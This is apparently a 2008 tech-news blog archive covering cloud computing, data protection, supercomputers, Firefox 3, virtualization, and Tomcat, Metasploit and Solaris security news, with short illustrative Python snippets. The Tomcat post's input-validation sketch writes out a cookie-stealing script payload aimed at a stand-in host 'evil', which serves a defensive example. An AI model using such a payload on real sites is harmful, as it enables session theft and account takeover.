Wednesday, June 25, 2008

Heads in the Clouds

Last night I attended Cloud Camp, an impromptu conference in San Francisco that focused on cloud computing. The event was thrown together in three weeks and took advantage of a large number of Web admins, developers, movers and shakers being in town for other shows. This was an unconference, a term coined years back at BarCamp, a collaborative get-together that was created to show up O’Reilly’s exclusive Foo Camp. That means there were no scheduled talks or keynotes, only a big paper grid, some sharpies, and lots of enthusiastic folks to talk and ask questions.

When the attendees had announced their proposed sessions and placed them in the grid of times and meeting spaces, the 300 or so attendees filed out and went to chat about what exactly cloud computing is. And the resounding conclusion reached by most was that Cloud is the new SOA. And that’s not a good thing.

The first talk I attended was supposed to be about cloud architecture. Hurrah, I thought, let’s hear about how you open an account with Dell and get those servers into the grid 10 minutes after you unbox them. But, no, the talk ended up being a lengthy product pitch, veiled in a thin smear of “what’s in a cloud stack.” It quickly descended into the leader extolling the benefits of a cloud-based markup language used to describe system stacks. Of course, this was the lead engineer behind said markup language, and it was also the primary product of his startup.

Strike one.

Next, I attended a talk on using Ruby in the cloud, though the talk was ostensibly about reaching 1 billion page-views a month. This discussion focused on the success LinkedIn had using Joyent to host its Facebook application. All I got from this discussion, aside from some excellent Ruby speed tips, was the distinct feeling that I’m missing out on the gold rush taking place inside Facebook applications.

Strike two.

The most interesting part of the evening for me wasn’t the talks, though I hear Google’s Kevin Marks actually managed to spark up a good session, and that Amazon’s Web Services guys were there to listen to complaints. My night was capped off by a lengthy discussion with an unabashed, unashamed venture capitalist. We chatted for a long time about where the money could be made in the cloud. His conclusion was that there would eventually be big roles for middle-men. I called them integrators, but he wasn’t so confident in that term.

Foul tip, just down the third base line.

The trouble with the cloud, right now, is that it’s being used to describe a number of different types of systems. There’s the Google-Amazon model, where you build a non-critical application and host it inside the massive grid of computers at these Web companies. That’s what cloud is supposed to mean. The other cloud, however, is the internal cloud: a term used to describe a massive grid inside a company, where individual applications are provisioned, allocated and dynamically resized to take advantage of a slice of this big grid. It’s commodity hardware in the basement, squeezed into injection-molded use cases.

Hmmm, sounds an awful lot like service-oriented architecture, doesn’t it? SOA can mean internal systems, connecting and chatting the way we always wanted them to but never quite managed. Or, SOA can mean bringing in SaaS and tools from outside and tying them to internal systems. They’re almost exact opposites. But then, they aren’t at all. They just vie for the same resources, attention and standards. Yet making the Subversion server talk to the change management server is almost entirely unlike making Salesforce.com talk to your company’s Exchange server.

And yet, they’re very similar. As similar as, say, two clouds. Shapes and forms, speeds and purposes aren’t the real meat of a cloud. The meat is in the viewer. What do you see in that cloud? Oh, Winnie the Pooh! And that one? A rain storm.

If my new VC friend is right, the clouds will soon be filling up with folks who can fill in the mortar between applications, servers and cloud hosts. Not unlike the wildly large ecosystem of SOA tools and products that sprouted up over the last three years, cloud computing will likely become a super buzz word, if it hasn’t already. It’ll be the place where we start to find new standards, new innovations, and new three-letter acronyms.

Let’s just hope that this time, there are fewer standards involved. The last thing we need right now is a new set of WS-*.

-- Alex Handy

Monday, June 23, 2008

Top 10 Reasons for Continuous Data Protection

At last week's HP confab in Las Vegas, FalconStor executive Peter Eicher gave a talk called "Ten Reasons You Need Continuous Data Protection."

FalconStor sells a solution in this area, and a few of the reasons were product-centric, such as the flexibility to use any storage device or protocol you choose. Others, however, were more general in nature and addressed some issues regarding data backup and recovery.

Continuous data protection gives multiple recovery points, and moves away from the once-a-day practice of backing up data. "It's the single overriding reason" people adopt CDP, Eicher said. But there is the issue of data integrity to consider. Using what Eicher termed "full CDP," users are continually capturing data, so in the event of a disaster, nothing is lost. However, recovery time can be quite long. "Near CDP," he said, allows for snapshots of the data at regular intervals, making recovery quicker, but introducing the possibility of data loss, if something was written to the server between the last snapshot and the failure. "How bad is it if you miss a few transactions? If each order is for a million dollars, you don't want to miss any," he said.
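To make the trade-off concrete, here is a minimal sketch of the recovery-point math Eicher is describing. It is illustrative only, not FalconStor's implementation, and the function names and numbers are hypothetical:

```python
# Minimal sketch of the full-CDP vs. near-CDP trade-off described above.
# Illustrative only -- not FalconStor's implementation; names and the
# replay-rate constant are hypothetical.

def worst_case_data_loss(mode: str, snapshot_interval_min: float = 0.0) -> float:
    """Worst-case window of lost writes (in minutes) after a failure."""
    if mode == "full":
        # Every write is journaled continuously, so in principle
        # nothing written before the failure is lost.
        return 0.0
    if mode == "near":
        # Anything written after the last snapshot is gone; the worst
        # case is a failure just before the next snapshot fires.
        return snapshot_interval_min
    raise ValueError(f"unknown CDP mode: {mode!r}")

def recovery_time_estimate(mode: str, journal_size_gb: float) -> float:
    """Rough relative recovery time in minutes: replaying a full-CDP
    journal takes far longer than promoting a ready-made snapshot."""
    replay_rate_gb_per_min = 1.0  # hypothetical
    return journal_size_gb / replay_rate_gb_per_min if mode == "full" else 1.0

print(worst_case_data_loss("full"))        # 0.0 -- nothing lost, slow restore
print(worst_case_data_loss("near", 15.0))  # 15.0 -- up to one interval lost
```

In other words, the choice between full and near CDP is a choice about which you can afford to lose: minutes of transactions or hours of recovery time.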

Eicher also spoke about the benefits of server virtualization beyond simple consolidation, and how the technology can aid in backup and recovery. If you're running 10 virtual machines on one physical machine, you can run into CPU, memory and I/O capacity issues at backup time. FalconStor's approach to CDP lets users back up at the disk level, not the host level, so the impact is greatly reduced. And, from a recovery standpoint, you can have one VM standing in for 100 physical servers, and each can recover boot images from the CDP device. No longer is data recovery a one-to-one deal, Eicher noted.

CDP, he said, also helps organizations get rid of tape at remote offices, where the person in charge of changing tapes is usually not an IT worker. Tapes often get jammed or lost in shipment back to headquarters, and when that person goes on vacation, no backup is done at all. Using CDP, the data is kept on the box and replicated back to the data center, where it can then be transferred to tape storage.

At the conference, Eicher said he heard of a unique use of CDP: one company was using it for virus scanning. "Live scanning slows down the e-mail server a lot," he said. "By taking a snapshot of the e-mail server and running the virus scan against it, there's no impact to the live server. If a virus is found in one mailbox, you go right to it, without having to scan every mailbox. I thought that was a pretty interesting application of CDP."

-- David Rubinstein

Friday, June 20, 2008

Meep! Meep! IBM's Roadrunner Most Powerful Supercomputer

The TOP500 list of the world's most powerful supercomputers was released at the International Supercomputing Conference this week, and IBM hogged the top slots. Big Blue claimed first place. And second. And third.

IBM's "Roadrunner" supercomputer won the title of the world's most powerful supercomputer. The Roadrunner, which is installed at the U.S. Department of Energy's Los Alamos National Laboratory, achieved a peak performance of 1.026 petaFLOPS, running past IBM's BlueGene L and P systems to claim first place.

Roadrunner is a hybrid system that combines IBM's Cell Broadband Engine processors with AMD's Opteron dual-core processors, making it one of the most energy-efficient machines on the list.

The former holder of the title, Blue Gene/L at the DOE's Lawrence Livermore National Laboratory, came in second this year with a performance of 478.2 teraFLOPS. IBM also grabbed third place with the Blue Gene/P system at the Department of Energy's Argonne National Laboratory near Chicago.

Also at the top of the list were Sun's Sun Blade x6420 "Ranger" system at the University of Texas, and the Cray XT4 "Jaguar" system at Oak Ridge National Laboratory in Tennessee.

While IBM claimed the top slots, Intel continued to dominate the list as a whole, with Intel processors now found in 75 percent of the TOP500 supercomputers, up from 70.8 percent on the 30th list released last year.

-- Michelle Savage

Thursday, June 19, 2008

Mozilla: Firefox Downloads Surpass 8 Million

Mozilla claimed a new download record for the release of Firefox 3.0 yesterday. It said that the newest version of the Firefox Web browser was downloaded more than 8 million times in the first 24 hours it was available.
Firefox devotees united in an attempt to set a world record for most software downloads in a single day. The category is new, and not yet certified by Guinness World Records, but it is expected to be approved this week.
The Tuesday release was delayed more than an hour as eager users checking for the new release overloaded Mozilla's Web servers. To complicate things further, the site was slow or unreachable for about two hours just before the scheduled release time. Fortunately, the servers recovered and users were able to download nearly on schedule.
And download they did! During peak periods, servers were accommodating more than 9,000 downloads per minute. Within 24 hours, Firefox 3.0 was downloaded 8.3 million times, beating Mozilla’s prediction of 5 million downloads.
So what’s the big deal with this release? It includes enhancements to help users organize their favorite Web sites and block access to sites known to distribute malicious software. It also lets Yahoo Mail users send e-mail through Firefox 3 by clicking a "mailto" link, such as one attached to a name or a "contact us" link on a Web page. Before, these links could only open a standalone desktop e-mail program. Firefox 3 also offers new design and speed improvements.

-- Michelle Savage

Wednesday, June 18, 2008

Noise on the Game Networks

As a video game enthusiast who landed a PlayStation 3 last Christmas, I’ve loved finally being able to play games on the PlayStation Network. No longer do I have to stick with my PC for all my online gaming. It’s great to play a few rounds of Call of Duty 4 or Grand Theft Auto IV instead of being forced to rotate between DOTA and Day of Defeat.

Playing on the PSN is also my third major exposure to in-game voice chat, but it’s my first time facing the notorious, oft-reported world of profane players (often children) heckling and cursing you out when you play them.

This is not news at all to anyone who’s ever played online, but I find it a hilarious phenomenon anyway. Before PSN, it was rare for me to encounter a chatter who would explode or otherwise disrupt the in-game voice chat by spamming noise so that nobody else could be heard. Usually, if anyone got out of hand, an admin could just step in and mute their Vent or Steam voice chat, and that would be that.

The servers I played on, which tended to be large and well organized, could be counted on to police that kind of behavior effectively. As such, the worst I ever encountered was someone playing their Casio keyboard into their mic, which brought back fond memories of my youth and my own keyboard. I wish I could remember that fellow’s name…

Anyway, the PSN is quite different. There are no admins and there are no organized servers; it’s just you and whoever else is out there randomly thrown together. I haven’t encountered too many voice chatters in GTAIV yet, but CoD4 provided a lot of material.

It’s probably not rocket science to figure out that this kind of behavior is pervasive because of anonymity. When you’re a 24-year-old playing in your own home, who is really going to discipline you for cracking racist jokes while waiting for a game to start? Who is really going to care, for that matter? Gamers have gone past the point where hearing a 10-year-old fling every curse in the book at you is anything special. It’s part of the landscape, and I think many of us find it fun.

So, if some kid in Tekonsha, Mich. wants to throw every slur up on the wall in Madden or NCAA Football, I say fire away, son.

-- Adam LoBelia

Coffee break-ing news

While the Internet has made journalism a lot easier--thanks to e-mail, information repositories and endless streams of PDF-formatted research reports--it's also made writing about something unique more difficult. Take, for example, my desire to write a new blog posting today on something I found on the BugTraq mailing list. When Craig Wright, manager for risk advisory services at BDO Kendalls Pty. Ltd., sent a message to the ubiquitous BugTraq yesterday stating that he could hack his coffee maker, I was naturally intrigued.
The run-down is as follows: The Jura Impressa F90 is a super high-end coffee machine that offers an optional Internet connection kit. Wright, naturally, threw some attacks at the thing and discovered that it ran Windows XP. He also discovered that he could take over the OS with remote attacks. What can you do with a hacked coffee machine? Well, you can make it spit out more water than the cup will hold, making a black puddle nearby. Or, you can spin the dials on all the coffee maker settings so that it essentially crashes when trying to make a cup of joe.
Oh, and there's no way to patch the thing to prevent these vulnerabilities.
Naturally, this is the sort of exciting story we here at Systems Management News would love to report on, just for giggles. It would even be worth getting ahold of Mr. Wright for an interview.
Unfortunately, because this is the Internet, the story has already been posted on Slashdot, Digg, Boingboing, and a host of other sites around the Web. Therefore, I felt that it would be relatively pointless for me to even mention the thing here.
Of course, I just did. It's hard not to get all reportery when people go plugging their kitchen appliances into the Internet. Up until now, the only Internet-connected appliances I've ever seen were a refrigerator at Microsoft's headquarters (a strange, out-of-place steel affair sitting alone in a visitor center waiting area) and the NetBSD project's seminal toaster. Anyone who's been to a conference where NetBSD had a booth has seen this thing: It's a red multi-slice toaster with an LED screen pasted onto the side. The fact that this contraption actually ran NetBSD really made no difference to the toaster: it still toasted in the normal fashion. But the fundamental point of that kitchen appliance was to prove that NetBSD can, in fact, run on just about anything.
So, now that we've cleared all this up, I'm off to make some good old-fashioned tea by putting water inside of a metal pot and placing it on top of an open flame. And while I may still have to worry about finding original stories to report in this competitive news industry, at least I won't have to worry about someone hitting up my beverage with a buffer overflow.

-- Alex Handy

Yes, you should defrag your solid state drives

Two of the hottest trends in IT are solid-state drives and virtualization. Both have resulted in an accidental boon for Diskeeper, which just about owns the market for defragmentation utilities. In fact, the company is advising top SSD manufacturers about fragmentation, according to VP of public affairs Derek De Vette.

Administrators are unsure what to do, posting queries on technology Web sites about defragging their SSDs. Interestingly, many experts are advising against SSD defragging, saying the concepts of contiguous placement and large-block storage are rendered moot by the new drives. Yet De Vette said fragmentation does occur, and that its performance hit is one reason the hype of SSDs outperforming mechanical disk drives hasn't yet been realized.

As for virtualization, people understand that the hard drive can fragment, and so can the virtualized environment. But De Vette said most administrators are only beginning to realize that fragmentation can also occur at the mapping level between the two layers. And he cautioned that too much fragmentation in a virtualized environment, just like in a physical one, can effectively shut it down.
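For the curious, fragmentation is easy to reason about as a count of discontiguous extents. Here is a toy sketch of how a file's fragmentation might be scored; the representation and scoring formula are hypothetical, not Diskeeper's method:

```python
# Toy illustration of scoring fragmentation: model a file as a list of
# (start_block, length) extents. One extent means contiguous; many small
# extents mean fragmented. This scoring is hypothetical, not Diskeeper's.

def fragmentation_score(extents: list[tuple[int, int]]) -> float:
    """Return 0.0 for a perfectly contiguous file, approaching 1.0 as
    every block becomes its own extent."""
    if len(extents) <= 1:
        return 0.0
    total_blocks = sum(length for _, length in extents)
    return (len(extents) - 1) / max(total_blocks - 1, 1)

print(fragmentation_score([(100, 64)]))                  # 0.0 -- contiguous
print(fragmentation_score([(10, 1), (50, 1), (90, 1)]))  # 1.0 -- worst case
```

The same arithmetic applies one layer down, which is why a guest file that looks contiguous to the VM can still be scattered across the host's physical disk.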

-- David Rubinstein

Live, from HP Technology Forum

HP is making a few product announcements at its Technology Forum and Expo in Las Vegas this week, including change management and blade server technologies. But HP partners also have some news—here are the latest updates:

Ascert Provides Test Plug-in for Quality Center

Ascert today launched the VersaTest Automation Plug-in for Quality Center, a bridge between VersaTest Automator and HP's Quality Center that provides centralized management and visibility, along with a repository of tests and test results.

According to Rob Walker, managing partner of Ascert, VersaTest Automation Plug-in enables automation and expands the reach of Quality Center into parts of the enterprise that could not otherwise be accessed. Using the plug-in, Quality Center users can define and execute VersaTest server-level interface tests within Quality Center and validate the pass or fail results automatically.

Walker acknowledged that not all Quality Center users are willing to learn yet another product. “So, we designed the plug-in to allow those users to execute VersaTest Automator tests and store test results from within the Quality Center software,” he said, adding that users do not have to acquire new skill sets to use it.

The VersaTest Automation Plug-in for Quality Center will run on Windows, Solaris and Linux servers.

HP User Groups “Connect”

Three large HP-focused user groups announced today that they have merged to provide a unified service to the 50,000 global users managing and maintaining old and new HP products and technologies.

By joining forces today, the former Encompass, HP-Interex EMEA and ITUG communities expect to expand their influence and power, while remaining independent of HP. The new group, called Connect, enables users to share knowledge and contacts while acting as a consumer advocate to HP.

The group plans to use Web 2.0 and social networking technologies to encourage community among its members and to attract a new generation of IT professionals, said Scott Healy, chairman of ITUG and vice president of industry solutions at GoldenGate Software.

-- Michelle Savage

Monday, June 16, 2008

High on Hyper-V

I went to an instructor-led lab at Microsoft Tech-Ed IT Professionals on Friday, where I was guided through the new capabilities in Windows Server 2008 that will enable Hyper-V virtualization. Since there is typically a difference in the user experience of a person who writes about technology (me) and a person who works with it every day (everyone else in the lab), I stopped a few attendees on the way out. Overall, the feedback was positive. Here are their comments:

“It’s so much better than their previous releases. It’s finally getting there. It’s good to see.”

“We all thought Microsoft was going to put out a cheap but crappy product and blow a lot of smoke about why we need to switch from VMware. But it (Hyper-V) actually looks pretty good.”

“I like it! It’s perfect for small businesses—it has a dummy-proof wizard that makes it easy to set up and manage VMs. Overall, it’s better than I expected.”

“There are pluses and minuses. Hyper-V comes with a good console. But they say you can’t turn off the drivers, which could be a problem."

“Ack…I don’t know…..I still don’t know.”

-- Michelle Savage

Friday, June 13, 2008

Quotes Flying? Better Duck!

Today, while working on a story about open source software in university IT systems, I had the distinct pleasure of speaking with a remarkably smart admin, whose name I can't use here. He's quoted in an upcoming story, but I can't call him by name in this piece because of some rather silly policies at his organization.

This fellow has his Unix down. He's a smooth operator with a vast knowledge of systems and software. But his statements are closely monitored by the university publicity department. They've obviously got everyone on campus trained well, because the admin told me we'd have to get approval for the story from these folks before we could run it.

He assured me that these were reasonable people who wouldn't want to quibble with any details in the story; they'd just want to ensure they were covered from a liability standpoint. To illustrate this point, the admin told me that if I referred to his IT team by the college mascot's name, something I was able to Duck in my article, Systems Management News and I could be open to a trademark lawsuit from the NCAA Pac-10 Conference. That mascot is, after all, owned by the college and the conference.

I'm sure this was all a misunderstanding. I'm sure the university of this unnamed state, one of the many, many states in our nation that begins with the letter “O,” has no plans to sue us. I'm sure the fear was that we'd have a massive pull quote on the front page featuring the animal, cartoon character, and worst of all, the name of the college mascot. Or that we'd show a bump in single-issue sales for using a specific college logo on the cover. Or, heaven forbid, that our readers would learn that such bright, articulate people were associated with that university.

Unfortunately, such is life in this litigious society. And perhaps some universities are just too sensitive about becoming known as the place where Animal House was filmed.

-- Alex Handy

Wednesday, June 11, 2008

Microsoft Wants to Change Desktop Virtualization

Server virtualization is a hot topic at this year’s Tech-Ed IT Professionals conference, but Microsoft is bullish on the importance of application virtualization technology. In his keynote, Bob Muglia, senior vice president of Microsoft's Server and Tools Business unit, highlighted an untapped opportunity “to take and separate applications from the underlying operating system image, and allow those applications to be delivered much more effectively without going through a complex installation process.” He said we’ll see these technologies over the next few years.
To show off how far it has come in the desktop virtualization space, Microsoft demonstrated how it has integrated technology from Kidaro, a company it recently acquired, to develop its "Microsoft Enterprise Desktop Virtualization" product. This solution gives IT administrators the ability to "manage and deploy virtual PCs out to their end users' desktops," according to Jameel Khalfan, a product manager for Windows. Got an application that is incompatible with Vista? Kidaro lets it run in a virtual machine. The technology also lets users control copy-and-paste between a virtual machine (VM) and the host system. Users can also redirect URLs to a VM.
According to Khalfan, the Microsoft Enterprise Desktop Virtualization application will be included in the Desktop Optimization Pack when that product is released next year. The general opinion among conference-goers is that if Microsoft can deliver on this promise, it’ll be a hero in the desktop virtualization market.

-- Michelle Savage

RTI Has Google to Thank

Real Time Innovations Inc. (RTI), spun off from a Stanford University robotics research group, has been providing real-time middleware to the aerospace and defense industries for about a dozen years. Its systems are used to coordinate communications for transportation, intelligence and simulations, so that information picked up by a radar system, for instance, can be fed into a larger data pool where it can then be analyzed, prioritized and responded to in real time.
So, what was RTI, a company with deep roots in the industrial embedded systems market, doing at the SIFMA financial markets conference and expo that began today in New York City? “It’s about real-time, low-latency messaging,” RTI vice president David Barnett told me over breakfast. He said RTI is partnering with a consulting company called Zivlyn Systems LLC to develop a trading platform designed specifically to handle higher volumes and replace legacy trading systems. RTI created a “data cloud” configuration that allows applications to subscribe to it, and RTI figures out the message switching and routing, as well as providing caching, filtering and other services. (The company also announced extended support for the .NET Framework and languages, to create a single infrastructure to support high-performance trading in heterogeneous environments.)
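RTI's platform is built around publish/subscribe messaging. The toy sketch below is an in-process stand-in for the pattern Barnett describes, with applications subscribing to topics in a shared data cloud while the middleware handles routing, caching and filtering; the class and method names are mine, not RTI's API:

```python
# Toy publish/subscribe "data cloud" illustrating the pattern described
# above. The names are hypothetical -- this is not RTI's API.
from collections import defaultdict
from typing import Callable

class DataCloud:
    def __init__(self):
        self._subscribers = defaultdict(list)  # topic -> [(filter, callback)]
        self._cache = {}                       # topic -> last message (caching)

    def subscribe(self, topic: str, callback: Callable[[dict], None],
                  content_filter: Callable[[dict], bool] = lambda m: True):
        """Register interest in a topic; the cloud does the routing."""
        self._subscribers[topic].append((content_filter, callback))

    def publish(self, topic: str, message: dict):
        """Cache the message and route it to every matching subscriber."""
        self._cache[topic] = message
        for content_filter, callback in self._subscribers[topic]:
            if content_filter(message):
                callback(message)

cloud = DataCloud()
# A trading app subscribes only to large orders -- content filtering.
cloud.subscribe("orders",
                lambda m: print("big order:", m),
                content_filter=lambda m: m["qty"] >= 1000)
cloud.publish("orders", {"symbol": "IBM", "qty": 5000})  # delivered
cloud.publish("orders", {"symbol": "IBM", "qty": 10})    # filtered out
```

Decoupling publishers from subscribers this way is what lets the same middleware serve a radar feed one year and a trading feed the next.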
But how does a company servicing the military-industrial complex get a foot in the door in the financial markets? “They came to us, actually,” Barnett said. “Google is how they found us. We talk about low-latency and real time and high throughput, and those were the keywords they found us with. It turns out these are real problems in this market.”
Now, RTI is on the financial world's radar.

-- David Rubinstein

Tuesday, June 10, 2008

It's All in the Delivery

Vaclav Vincalek is puzzled. The founder of a startup software delivery provider called Boonbox recalls the days of ASP – application service providers – and how widely they were rejected by enterprises that scoffed at the notion of keeping their prized data and applications anywhere but behind locked and guarded doors. Now, just a few short years later, he can't believe how completely companies trust outside organizations with their data. Granted, security standards have come a long way -- or have they? Remember Hannaford, and how hackers stole credit card data from the supermarket chain's system, which was certified PCI DSS-compliant.
Boonbox is an offshoot of Pacific Coast Information Systems Ltd. (PCIS), an IT consultancy founded in 1995 to help businesses use the correct software to solve business problems. So Vincalek remembers the pushback to this method of delivery. "When e-mail was new and organizations wanted to install e-mail systems, we offered to host them, but they wanted the server in their server room. The mentality that e-mail would be moved out of the office was unheard of." So the shift to more offsite hosting leaves Vincalek scratching his head, and taking shots at Google, which is building out an application hosting platform, a la Salesforce.com. "Google is the biggest threat to our privacy right now," Vincalek said. "They keep everything to themselves and don't tell you what they're doing with it."

-- David Rubinstein

Monday, June 9, 2008

Facebook's Now an Open Book

Facebook has open-sourced major areas of the Facebook Platform. Why? Because developers asked them to.
In a recent announcement, the social networking company said that this is "just a first step" in a major release. Now developers or any third party can download source code, which includes "most of the code that runs Facebook Platform plus implementations of many of the most-used methods and tags."
Most of the open-source code is being made available via the Common Public Attribution License (CPAL), while the FBML parser is governed by the Mozilla Public License (MPL).
While allowing the developer community to play with and improve the code base of Facebook Platform is probably the biggest benefit of going open source, competing social Web sites can now also access the code to support their own third-party application deployment.
Word in the Valley is that Facebook’s move is a reaction to OpenSocial, an open source platform supported by Google, MySpace and Yahoo. OpenSocial threatens Facebook's platform, as it has the potential to make it easier for social networking sites to match Facebook's catalog of third-party applications.

-- Michelle Savage

Friday, June 6, 2008

GoogleTown -- Coming Soon to Mountain View

Internet giant Google is leasing land in Mountain View from NASA’s Ames Research Center to build a new research and development campus. But "high-tech campus" doesn’t quite describe what Google plans to build — it’s more like a mixed-use development.
The campus will contain 1.2 million square feet of office and research and development facilities on 42.2 acres in the research park. Here, Google will work on high-tech research projects, such as large-scale data management, massively distributed computing and human-to-computer interfaces.
But here’s where Google raises the bar. The company will also build "high-quality, affordable" housing on campus, in an attempt to attract top talent. It will also build restaurants, fitness facilities, a child care center, a basketball court, and conference and parking facilities for employees, while providing NASA with recreation and parking facilities and infrastructure improvements. There may even be room for retail shops in the future.
The lease is for 40 years but could be extended for up to 90 years. And it didn’t come cheap — Google agreed to pay $146 million over the lifetime of the lease.

-- Michelle Savage

Tomcat Vulnerable to HTML-Based Attack

The Apache Software Foundation's Tomcat Java application server is vulnerable to an HTML-based attack. The vulnerability, disclosed Wednesday and updated yesterday, allows remote attackers to inject HTML code into the hostname field of the host manager screen. The resulting code injection could be used to gather up administration cookies, allowing an attacker to take over the system if the operator has enabled cookie-based authentication.

Tomcat versions 5.5.9 through 5.5.26 and 6.0.0 through 6.0.16 are affected by this vulnerability. Tomcat does not sanitize input in the hostname field, which is what allows the injection. As of today, Apache has not released a patch for this vulnerability.
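The general defense against this class of bug is to treat the hostname as data, not markup, before echoing it back into a page. The sketch below shows the technique in outline; it is illustrative only, not Tomcat's eventual fix, and the function and pattern names are made up:

```python
# Illustrative sketch of the missing input handling: validate and escape
# a user-supplied hostname before echoing it into an admin page.
# This is not Tomcat's actual patch, just the general technique.
import html
import re

# Hostnames may contain only letters, digits, dots and hyphens
# (RFC 952/1123), so a strict whitelist beats after-the-fact escaping.
_HOSTNAME_RE = re.compile(r"^[A-Za-z0-9.-]{1,253}$")

def render_hostname(raw: str) -> str:
    """Return a string safe to embed in the host-manager HTML page."""
    if not _HOSTNAME_RE.match(raw):
        raise ValueError("invalid hostname")
    return html.escape(raw)  # belt and suspenders: neutralize <, >, & and quotes

# A malicious "hostname" like this would otherwise be injected verbatim:
try:
    render_hostname('<script>location="http://evil/?c="+document.cookie</script>')
except ValueError:
    print("rejected")  # the whitelist stops the cookie-stealing payload
```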

--Alex Handy

Oh, the drama at Yahoo!

I’m not sure why any of us bother to watch staged reality TV shows when the real drama is unfolding before our very eyes in the form of Yahoo and Microsoft letters.
In the latest open letter to Yahoo Chairman Roy Bostock, billionaire investor Carl Icahn on Wednesday used the words "deceitful," "self-destructive," "misleading" and "insulting to shareholders" to express his frustration with what he sees as the "inordinate lengths" the company has gone to in keeping Microsoft from buying Yahoo.
Icahn's letter was sparked by details disclosed earlier this week in a lawsuit filed by Yahoo shareholders who disagree with the way Yahoo handled Microsoft’s recent $44.6 billion acquisition offer. Citing details from the shareholder suit, Icahn wrote that CEO Jerry Yang and other board members used unnecessary tactics, including a costly severance plan for Yahoo employees, to “entrench their positions and keep shareholders from deciding if they wished to sell to Microsoft.”
He said that merging with Microsoft is the "only way to salvage" the company. "It is insulting to shareholders that Yahoo for the last month has told us that they are quite willing to negotiate a sale of the company to Microsoft and cannot understand why Microsoft has walked away," Icahn wrote. "However, the board conveniently neglected to inform shareholders about the magnitude of the plan it installed which made it practically impossible for Microsoft to stay at the bargaining table."
The company’s next shareholder meeting is Aug. 1, and Icahn has said he'll try to oust Yang and others if they don’t change their ways. "It may be too late to convince Microsoft to trust Yang and the current board to run the company during that period while Microsoft sits on the sidelines with $45 billion at risk. Therefore, the best chance to bring Microsoft and Yahoo together is to replace Yang and the current Yahoo board with a board that will negotiate in good faith with Microsoft," he added.
Yahoo resisted the attack, saying in its reply letter that Icahn's criticism "seriously misrepresents and manipulates the facts."
Icahn may want to get rid of Yang, but it will be hard to find a cheaper CEO. Yahoo's proxy filing lists Yang's 2007 salary as $1, with no other compensation reported. Of course, he owns 3.9 percent of the company, but that would be his regardless.

-- Michelle Savage

Wednesday, June 4, 2008

Chinese Hackers Going Crazy Everywhere

Metasploit was hacked! Metasploit got hax0r3d! OMG, FYI, beware!

But wait, it’s not as bad as all that. The apotheosis of cool hacker tools was indeed attacked, but as it turns out, the Chinese hackers responsible never actually got into Metasploit’s servers.

According to HDM (H.D. Moore, project lead on your arch-nemesis Metasploit, the application exploitation payload framework), reports of Metasploit’s Web site being hacked were greatly exaggerated. In fact, they were just a testament to the old adage: “There is no such thing as 100 percent security.”

“They can’t pwn the real server, so they pwn one next to it,” wrote HD on IRC. “Then use that to 'man-in-the-middle’ the http responses and inject their own code.”

Essentially, the Chinese hackers who wanted to own Metasploit (and they have been quite active everywhere recently; no, that's not just your logs) had to compromise the entire ISP where Metasploit’s Web site is hosted. When requests came in, the server nearest it on the switch played stand-in. Not that it mattered: the actual code of Metasploit is hosted elsewhere, and the MD5s wouldn’t match up.
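That last point is the practical takeaway: when the network between you and a project can't be trusted, verify the published checksum out of band before installing anything. A quick sketch of the check follows; the file name and expected digest are made up:

```python
# Sketch of the integrity check that foiled the attack: compare a
# downloaded file's MD5 against the value published out of band.
# The file name and expected digest are made up. (MD5 was the norm in
# 2008; a stronger hash is preferable where you have the choice.)
import hashlib

def md5_of(path: str, chunk_size: int = 1 << 20) -> str:
    digest = hashlib.md5()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()

expected = "9e107d9d372bb6826bd81d3542a419d6"  # hypothetical published MD5
if md5_of("framework-3.1.tar.gz") != expected:
    raise SystemExit("checksum mismatch -- possible tampering, do not install")
```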

After all the kerfuffle over Chinese hackers I’ve heard over the last week and a half, I have to wonder if some of the resident rebels in China aren’t being forced into such nefarious hack attacks by government policies. I’m not saying that the Chinese government is encouraging hacking of foreign systems, but the country’s internal filtering and censoring policies could be forcing rebellious teens into hacking by default.

Since blogging about the mistakes of China’s policies is essentially illegal, it’s likely that the computer-literate—who in the U.S. write oodles of blogs and protest in the streets—have given up on effecting political change, and have instead spent their lives learning how to mess with other people’s data.

Everyone knows about the Great Firewall of China: the filter that keeps dissident content out of Chinese computers. Unfortunately, nothing seems to be filtering what’s coming out of China: an ever-increasing flow of nasty packets aimed at bringing foreign servers to their knees.

And something about the month of May was particularly exciting for the Chinese hacker world. I’ve heard from a number of sources that their systems were under particularly high volumes of attacks as the month went on. Maybe this is just how China gets ready for the Olympics.

-- Alex Handy

Tuesday, June 3, 2008

Houston, We Have a Fire

The explosion and fire in Planet.com’s Houston, Texas, data center facility over this past weekend served as a scorching reminder of the importance of a strong backup plan.
Houston Fire Department officials said that the Planet.com Internet Services data center, where it creates, hosts and maintains Web sites for its clients, was rocked by an explosion in a network gear room. Apparently, no servers or networking equipment were damaged, and no one was hurt, but power was cut to the facility, affecting about 9,000 servers. The blast was strong enough to push three walls of the facility out of place. The incident was attributed to an electrical problem with a transformer. With an estimated 7,500 of its clients hoping the issue comes to a quick resolution, Planet.com is putting its recovery plan into action. Some servers will be relying on generator power for a week until normal utility connections are restored, according to Douglas Erwin, Planet.com’s CEO.
One of the interesting things that Planet.com employees are doing is providing updates on the data center’s progress through an online forum. This is seen as an important part of the disaster recovery plan. The latest updates say that the company is doing a rack-by-rack check for any servers that require technical support. Erwin said that 6,000 of the 9,000 servers have been restored, and the next step is to rebuild the electrical room, which will take place in the next week or so.
This fire certainly serves as a reminder that a solid backup plan is critically important. Of course it is impossible to prepare for everything, but certain steps can be taken to mitigate problems. Planet.com, for instance, added a backup server in March with continuous data protection. Turns out it wasn’t such a bad idea.

-- Jeff Feinman

Monday, June 2, 2008

Sun Patches Solaris

Sun Microsystems patched a number of vulnerabilities in Solaris 8, 9 and 10 over the past few days. Three stack-based buffer overflows in the Samba 3.0 code in Solaris 9 and 10 were patched; these vulnerabilities could have allowed a remote user to inject code through Samba requests across a network. A patch for these vulnerabilities is available now, and a second patch can be obtained online. Additionally, Sun issued patches for Solaris 8, 9 and 10 that fix a hole in crontab: malicious users could potentially escalate their privileges on a system by creating race conditions in the crontab utility. A fix is available.
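For readers wondering what a crontab race condition looks like in practice, the classic pattern is a time-of-check-to-time-of-use (TOCTOU) window on a predictably named file that a privileged program creates. The sketch below illustrates the bug class and the safe idiom in general terms; it is not Sun's specific flaw, and the path is hypothetical:

```python
# Generic sketch of the file-handling race (TOCTOU) behind many
# privilege-escalation bugs like the crontab hole above. This shows the
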